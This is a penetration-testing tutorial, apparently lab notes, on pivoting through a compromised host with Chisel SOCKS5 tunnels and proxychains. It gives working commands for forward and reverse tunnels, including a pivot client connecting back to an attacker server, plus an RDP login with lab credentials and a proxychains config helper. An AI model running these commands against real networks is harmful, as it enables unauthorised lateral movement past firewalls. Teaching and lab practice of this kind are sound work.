SOCKS5 Tunneling with Chisel

Chisel works over both HTTP and SSH: HTTP transports the data, and SSH secures the communication. Chisel binaries are available for both Linux and Windows. We can also build the binary on our own machine, but this requires Go (Golang) to be installed. Chisel can be used to create a TCP/UDP SOCKS tunnel between two different subnets, and it always operates as a client/server pair.

Note that the same version of Chisel is needed for both the client and server.

When to use?

  • Can be an alternative when establishing an SSH session with the pivot host is not possible.

Downsides

  • Requires proxychains

Running the server on the pivot host

We transferred the Chisel binary to the pivot host using the scp utility. The pivot host has two network interfaces, one of which is attached to the 172.16.5.0/23 network. The following command was used to start the Chisel server. The server listens on port 1234 for incoming connections and, through SOCKS5, forwards traffic to every network the pivot host is attached to.

ubuntu@WEB01:~$ ./chisel_1.8.1_linux_amd64 server -v -p 1234 --socks5

On our attacker machine, we ran the Chisel client that connected to the Chisel server on port 1234.

./chisel_1.8.1_linux_amd64 client -v 10.129.202.64:1234 socks

As can be seen below, a successful connection has been established between the Chisel server and the client. The Chisel client listens on port 1080 by default for incoming connections.

Configuring proxychains

Now we have to configure the /etc/proxychains.conf file to forward all of our localhost traffic to port 1080.
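The following added example (my own helper, not part of the original notes or of Chisel) writes the proxychains configuration the step above describes and then checks, by parsing a /proc/net/tcp style table, that the port-1080 SOCKS listener is bound to loopback only before proxychains is pointed at it. It assumes a Linux /proc/net/tcp layout; the function names, the proxy_dns and timeout settings, and the table-path override are my choices rather than Chisel or proxychains defaults.

```shell
#!/bin/sh
# Added example, not from the original notes. Assumes a Linux /proc/net/tcp
# layout and Chisel's default SOCKS port of 1080 (as stated above).

# Write a minimal proxychains configuration that routes everything through
# the local SOCKS5 listener. proxy_dns sends name lookups through the tunnel
# so internal hostnames resolve on the pivot side instead of leaking locally.
write_proxychains_conf() {
    out="$1"; port="${2:-1080}"
    cat > "$out" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $port
EOF
}

# Inspect a /proc/net/tcp style table for a LISTEN socket on port $1.
# Returns 0 if it listens on 127.0.0.1 only, 1 if it is bound to 0.0.0.0
# (reachable from other hosts, which is not what we want for a pivot
# proxy), and 2 if no listener is present. $2 overrides the table path so
# the check can be run against a saved copy of the table.
socks_listener_state() {
    port="$1"; table="${2:-/proc/net/tcp}"
    hexport=$(printf '%04X' "$port")     # 1080 -> 0438
    state=2
    while read -r _sl laddr _raddr st _rest; do
        case "$laddr" in
            *:"$hexport") ;;             # local port matches
            *) continue ;;
        esac
        [ "$st" = "0A" ] || continue     # 0A = TCP_LISTEN
        case "$laddr" in
            0100007F:*) state=0 ;;       # 127.0.0.1 in little-endian hex
            00000000:*) return 1 ;;      # 0.0.0.0: exposed on all interfaces
        esac
    done < "$table"
    return "$state"
}

# Usage once the Chisel client is up (proxychains-ng's -f selects the file):
#   write_proxychains_conf ./proxychains.conf 1080
#   socks_listener_state 1080 && proxychains4 -f ./proxychains.conf <command>
```

The same listener check, run from the defender's side, is a quick way to spot an unexpected SOCKS proxy on a host: a 0.0.0.0 binding on a forwarding port means the tunnel is usable by anyone who can reach that host.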

Now that our tunnel and SOCKS proxy are configured, we can use the tunnel to RDP into a Windows system located in the 172.16.5.0/23 subnet.

proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Reverse Pivot

Chisel can also be used to configure a reverse tunnel from the pivot host to our attacker machine. Unlike the previous scenario, the server runs on our attacker box and the client on the pivot connects back to our Chisel server. Reverse tunneling is handy when inbound connections to the pivot host are blocked by firewalls.

Setting up the server

The following command starts the Chisel server on our attacker host. Port 1234 listens for the Chisel client connection. As in the previous scenario, the SOCKS proxy port is 1080 by default.

sudo ./chisel_1.8.1_linux_amd64 server --reverse -v -p 1234 --socks5

Connect the client

On the pivot server, we used the following command to connect the Chisel client to our Chisel server on port 1234.

./chisel client -v 10.10.14.136:1234 R:socks

As in the previous scenario, we configure our proxychains.conf file with the listener on port 1080. We can then use proxychains and xfreerdp to establish an RDP session to the Windows target server located on the 172.16.5.0/23 network.
